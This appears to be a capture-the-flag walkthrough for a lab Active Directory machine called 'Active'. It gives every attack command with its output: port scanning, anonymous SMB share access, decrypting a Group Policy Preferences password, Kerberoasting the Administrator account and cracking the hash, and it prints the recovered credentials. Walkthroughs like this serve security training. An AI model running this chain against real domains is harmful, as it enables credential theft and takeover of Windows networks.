Active
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.192.152
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-05 02:08 EDT
Nmap scan report for 10.129.192.152
Host is up (0.014s latency).
Not shown: 60173 closed tcp ports (conn-refused), 5341 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
49170/tcp open unknown
49172/tcp open unknownSince this is an AD machine, we can start with basic enumeration of SMB shares, Kerberos and LDAP.
SMB Enum
Checking SMB shares via smbmap reveals there is one share available:
$ smbmap -H 10.129.192.152
[+] IP: 10.129.192.152:445 Name: 10.129.192.152
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESSWe can use smbclient to login and view the files:
$ smbclient -U "" //10.129.192.152/Replication -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5186557 blocks availableWe can download all the files present within the machine using these commands, and I saw an interesting file:
mask ""
recurse ON
prompt OFF
mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (16.8 KiloBytes/sec) (average 23.8 KiloBytes/sec)Within this file, we can find an encrypted pasword:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>This was a GPO password, and it can be decrypted using gpp-decrypt since we have the key and the password.
$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18Now, we have a password of a service account to use. With this, we can read the C:\Users directory and find the flag in the Desktop of SVC_TGS user.
$ smbmap -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -H 10.129.192.152
[+] IP: 10.129.192.152:445 Name: 10.129.192.152
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLYPrivilege Escalation
Kerberoasting
We have access to a service account here, and it is for the Ticket Granting Service. As such, we can attempt to do Kerberoasting.
$ impacket-GetUserSPNs -request -dc-ip 10.129.192.152 active.htb/SVC_TGS -outputfile hashes.kerberoast
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-05-05 02:07:43.878117 So we can use this to harvest the TGS tickets for the administrator. Then, we can crack the hash (because user passwords are used to encrypt the tickets).
$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:04 DONE (2023-05-05 02:21) 0.2277g/s 2400Kp/s 2400Kc/s 2400KC/s Tiffani1432..Thrash1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Then, we can get a shell via smbexec.py.
Rooted!